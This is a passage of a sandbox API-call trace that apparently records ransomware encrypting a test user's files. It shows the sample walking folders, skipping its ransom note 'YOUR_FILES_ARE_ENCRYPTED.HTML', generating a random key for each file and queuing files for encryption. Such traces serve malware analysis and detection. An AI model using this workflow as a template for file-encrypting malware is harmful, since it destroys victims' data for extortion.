nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Cookies", cAlternateFileName="")) returned 1 [0165.845] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Cookies") returned 31 [0165.845] GetProcessHeap () returned 0x270000 [0165.845] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0165.845] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Cookies" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Cookies") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Cookies" [0165.845] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Cookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Cookies\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Cookies\\*" [0165.845] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Cookies\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd2428b10, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5b347d0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="ꅠݎ")) returned 0xffffffff [0165.845] GetProcessHeap () returned 0x270000 [0165.846] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0165.846] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0x8ea966a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x8ea966a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, 
cFileName="Desktop", cAlternateFileName="")) returned 1 [0165.846] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop") returned 31 [0165.846] GetProcessHeap () returned 0x270000 [0165.846] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0165.846] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop" [0165.847] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\*" [0165.847] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0x8ea966a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x8ea966a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0165.847] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0x8ea966a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x8ea966a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.847] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34803d40, 
ftCreationTime.dwHighDateTime=0x1d7e1c7, ftLastAccessTime.dwLowDateTime=0x55ac7dc0, ftLastAccessTime.dwHighDateTime=0x1d7e632, ftLastWriteTime.dwLowDateTime=0x55ac7dc0, ftLastWriteTime.dwHighDateTime=0x1d7e632, nFileSizeHigh=0x0, nFileSizeLow=0xdd89, dwReserved0=0x0, dwReserved1=0x60, cFileName="0T2p_sFj5.mp3", cAlternateFileName="0T2P_S~1.MP3")) returned 1 [0165.847] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\0T2p_sFj5.mp3") returned 45 [0165.847] lstrcmpW (lpString1="0T2p_sFj5.mp3", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.847] PathFindExtensionW (pszPath="0T2p_sFj5.mp3") returned=".mp3" [0165.847] lstrlenW (lpString=".mp3") returned 4 [0165.847] PathFindExtensionW (pszPath="0T2p_sFj5.mp3") returned=".mp3" [0165.847] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0165.847] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\0T2p_sFj5.mp3" (normalized: "c:\\users\\5alr3u30d3\\desktop\\0t2p_sfj5.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a4 [0165.849] GetFileSizeEx (in: hFile=0x5a4, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=56713) returned 1 [0165.849] GetProcessHeap () returned 0x270000 [0165.849] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0165.850] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="41") returned 2 [0165.850] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="3B") returned 2 [0165.850] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="A5") returned 2 [0165.850] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="FB") returned 2 [0165.850] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="25") returned 2 [0165.850] wsprintfW (in: 
param_1=0x4ebdd56, param_2="%02X" | out: param_1="79") returned 2 [0165.850] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="D6") returned 2 [0165.850] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="B1") returned 2 [0165.850] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="09") returned 2 [0165.850] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="0B") returned 2 [0165.850] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="2F") returned 2 [0165.851] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="7F") returned 2 [0165.851] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="DB") returned 2 [0165.851] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="A6") returned 2 [0165.851] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="DC") returned 2 [0165.851] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="63") returned 2 [0165.851] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="38") returned 2 [0165.851] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="37") returned 2 [0165.851] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="CA") returned 2 [0165.851] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="44") returned 2 [0165.851] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="CB") returned 2 [0165.851] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="80") returned 2 [0165.851] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="21") returned 2 [0165.851] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="6A") returned 2 [0165.851] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="AA") returned 2 [0165.851] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="79") returned 2 [0165.851] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="06") returned 2 
[0165.851] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="4A") returned 2 [0165.851] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="E7") returned 2 [0165.851] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="EA") returned 2 [0165.851] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="3C") returned 2 [0165.851] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="3E") returned 2 [0165.852] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\0T2p_sFj5.mp3" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\0T2p_sFj5.mp3") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\0T2p_sFj5.mp3" [0165.852] CreateIoCompletionPort (FileHandle=0x5a4, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0165.852] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0165.852] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d9f1ae0, ftCreationTime.dwHighDateTime=0x1d7da5f, ftLastAccessTime.dwLowDateTime=0xe2394f00, ftLastAccessTime.dwHighDateTime=0x1d7e52b, ftLastWriteTime.dwLowDateTime=0xe2394f00, ftLastWriteTime.dwHighDateTime=0x1d7e52b, nFileSizeHigh=0x0, nFileSizeLow=0xccf2, dwReserved0=0x0, dwReserved1=0x60, cFileName="532X8kTI4Jfmvo22.bmp", cAlternateFileName="532X8K~1.BMP")) returned 1 [0165.852] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\532X8kTI4Jfmvo22.bmp") returned 52 [0165.852] lstrcmpW (lpString1="532X8kTI4Jfmvo22.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.853] PathFindExtensionW (pszPath="532X8kTI4Jfmvo22.bmp") returned=".bmp" [0165.853] lstrlenW (lpString=".bmp") returned 4 [0165.853] PathFindExtensionW 
(pszPath="532X8kTI4Jfmvo22.bmp") returned=".bmp" [0165.853] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e6e3d30, ftCreationTime.dwHighDateTime=0x1d7e41b, ftLastAccessTime.dwLowDateTime=0xfbfea5b0, ftLastAccessTime.dwHighDateTime=0x1d7e42d, ftLastWriteTime.dwLowDateTime=0xfbfea5b0, ftLastWriteTime.dwHighDateTime=0x1d7e42d, nFileSizeHigh=0x0, nFileSizeLow=0xe350, dwReserved0=0x0, dwReserved1=0x60, cFileName="6 IQKF_vkJtPe8lb.jpg", cAlternateFileName="6IQKF_~1.JPG")) returned 1 [0165.853] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\6 IQKF_vkJtPe8lb.jpg") returned 52 [0165.853] lstrcmpW (lpString1="6 IQKF_vkJtPe8lb.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.853] PathFindExtensionW (pszPath="6 IQKF_vkJtPe8lb.jpg") returned=".jpg" [0165.853] lstrlenW (lpString=".jpg") returned 4 [0165.853] PathFindExtensionW (pszPath="6 IQKF_vkJtPe8lb.jpg") returned=".jpg" [0165.853] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0165.853] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\6 IQKF_vkJtPe8lb.jpg" (normalized: "c:\\users\\5alr3u30d3\\desktop\\6 iqkf_vkjtpe8lb.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0165.854] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=58192) returned 1 [0165.855] GetProcessHeap () returned 0x270000 [0165.855] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x744a1c0 [0165.858] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="2C") returned 2 [0165.858] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="D2") returned 2 [0165.858] wsprintfW (in: 
param_1=0x4ebdd4a, param_2="%02X" | out: param_1="F3") returned 2 [0165.858] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="BA") returned 2 [0165.858] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="56") returned 2 [0165.858] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="9A") returned 2 [0165.858] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="7D") returned 2 [0165.858] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="6B") returned 2 [0165.858] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="64") returned 2 [0165.858] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="C8") returned 2 [0165.858] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="ED") returned 2 [0165.858] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="E1") returned 2 [0165.858] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="19") returned 2 [0165.858] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="AC") returned 2 [0165.858] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="63") returned 2 [0165.858] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="01") returned 2 [0165.858] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="14") returned 2 [0165.858] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="E9") returned 2 [0165.858] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="7D") returned 2 [0165.859] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="8B") returned 2 [0165.859] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="19") returned 2 [0165.859] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="03") returned 2 [0165.859] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="23") returned 2 [0165.859] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="AF") returned 2 
[0165.859] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="30") returned 2 [0165.859] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="57") returned 2 [0165.859] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="A6") returned 2 [0165.859] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="37") returned 2 [0165.859] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="73") returned 2 [0165.859] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="AF") returned 2 [0165.859] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="EE") returned 2 [0165.859] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="4B") returned 2 [0165.860] lstrcpyW (in: lpString1=0x745a274, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\6 IQKF_vkJtPe8lb.jpg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\6 IQKF_vkJtPe8lb.jpg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\6 IQKF_vkJtPe8lb.jpg" [0165.860] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x744a1c0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0165.860] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x744a1c0, lpOverlapped=0x744a1c0) returned 1 [0165.860] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92716370, ftCreationTime.dwHighDateTime=0x1d7d88a, ftLastAccessTime.dwLowDateTime=0x6bd93a20, ftLastAccessTime.dwHighDateTime=0x1d7e15f, ftLastWriteTime.dwLowDateTime=0x6bd93a20, ftLastWriteTime.dwHighDateTime=0x1d7e15f, nFileSizeHigh=0x0, nFileSizeLow=0x13f9c, dwReserved0=0x0, dwReserved1=0x60, cFileName="AtF590.mp3", cAlternateFileName="")) returned 1 [0165.860] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\AtF590.mp3") returned 42 
[0165.860] lstrcmpW (lpString1="AtF590.mp3", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.860] PathFindExtensionW (pszPath="AtF590.mp3") returned=".mp3" [0165.860] lstrlenW (lpString=".mp3") returned 4 [0165.860] PathFindExtensionW (pszPath="AtF590.mp3") returned=".mp3" [0165.860] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0165.860] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\AtF590.mp3" (normalized: "c:\\users\\5alr3u30d3\\desktop\\atf590.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0165.862] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=81820) returned 1 [0165.862] GetProcessHeap () returned 0x270000 [0165.862] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7472318 [0165.865] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="A1") returned 2 [0165.865] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="8F") returned 2 [0165.865] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="EC") returned 2 [0165.865] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="9F") returned 2 [0165.865] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="DA") returned 2 [0165.865] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="8D") returned 2 [0165.865] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="94") returned 2 [0165.865] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="AB") returned 2 [0165.865] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="F3") returned 2 [0165.866] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="EC") returned 2 [0165.866] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="54") returned 2 [0165.866] 
wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="91") returned 2 [0165.866] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="88") returned 2 [0165.866] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="B3") returned 2 [0165.866] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="C4") returned 2 [0165.866] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="7D") returned 2 [0165.866] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="EC") returned 2 [0165.866] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="A5") returned 2 [0165.866] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="95") returned 2 [0165.866] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="F7") returned 2 [0165.866] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="2D") returned 2 [0165.866] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="6E") returned 2 [0165.866] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="2D") returned 2 [0165.866] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="FE") returned 2 [0165.866] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="9A") returned 2 [0165.866] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="70") returned 2 [0165.866] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="D3") returned 2 [0165.866] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="CE") returned 2 [0165.867] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="E2") returned 2 [0165.867] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="87") returned 2 [0165.867] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="1D") returned 2 [0165.867] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="0C") returned 2 [0165.867] lstrcpyW (in: lpString1=0x74823cc, 
lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\AtF590.mp3" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\AtF590.mp3") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\AtF590.mp3" [0165.867] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x7472318, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0165.868] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7472318, lpOverlapped=0x7472318) returned 1 [0165.868] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x999a8b30, ftCreationTime.dwHighDateTime=0x1d7d804, ftLastAccessTime.dwLowDateTime=0x7adb2410, ftLastAccessTime.dwHighDateTime=0x1d7e444, ftLastWriteTime.dwLowDateTime=0x7adb2410, ftLastWriteTime.dwHighDateTime=0x1d7e444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ccAy71X", cAlternateFileName="")) returned 1 [0165.868] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X") returned 39 [0165.868] GetProcessHeap () returned 0x270000 [0165.868] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0165.868] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X" [0165.868] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\*" [0165.868] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x999a8b30, 
ftCreationTime.dwHighDateTime=0x1d7d804, ftLastAccessTime.dwLowDateTime=0x7adb2410, ftLastAccessTime.dwHighDateTime=0x1d7e444, ftLastWriteTime.dwLowDateTime=0x7adb2410, ftLastWriteTime.dwHighDateTime=0x1d7e444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff3db2bb, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0165.868] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x999a8b30, ftCreationTime.dwHighDateTime=0x1d7d804, ftLastAccessTime.dwLowDateTime=0x7adb2410, ftLastAccessTime.dwHighDateTime=0x1d7e444, ftLastWriteTime.dwLowDateTime=0x7adb2410, ftLastWriteTime.dwHighDateTime=0x1d7e444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff3db2bb, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0165.868] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6b61510, ftCreationTime.dwHighDateTime=0x1d7d841, ftLastAccessTime.dwLowDateTime=0x724778e0, ftLastAccessTime.dwHighDateTime=0x1d7dc50, ftLastWriteTime.dwLowDateTime=0x724778e0, ftLastWriteTime.dwHighDateTime=0x1d7dc50, nFileSizeHigh=0x0, nFileSizeLow=0xa08d, dwReserved0=0xff3db2bb, dwReserved1=0xffffffff, cFileName="-eVB6BoVlSlD5U.wav", cAlternateFileName="-EVB6B~1.WAV")) returned 1 [0165.868] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\-eVB6BoVlSlD5U.wav") returned 58 [0165.869] lstrcmpW (lpString1="-eVB6BoVlSlD5U.wav", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.869] PathFindExtensionW (pszPath="-eVB6BoVlSlD5U.wav") returned=".wav" [0165.869] lstrlenW (lpString=".wav") returned 4 [0165.869] PathFindExtensionW (pszPath="-eVB6BoVlSlD5U.wav") returned=".wav" [0165.869] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | 
out: RandomBuffer=0x4ebdaf8) returned 1 [0165.869] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\-eVB6BoVlSlD5U.wav" (normalized: "c:\\users\\5alr3u30d3\\desktop\\ccay71x\\-evb6bovlsld5u.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b0 [0165.873] GetFileSizeEx (in: hFile=0x5b0, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=41101) returned 1 [0165.873] GetProcessHeap () returned 0x270000 [0165.873] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75f0050 [0165.878] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="93") returned 2 [0165.878] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="D5") returned 2 [0165.878] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="2B") returned 2 [0165.878] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="48") returned 2 [0165.878] wsprintfW (in: 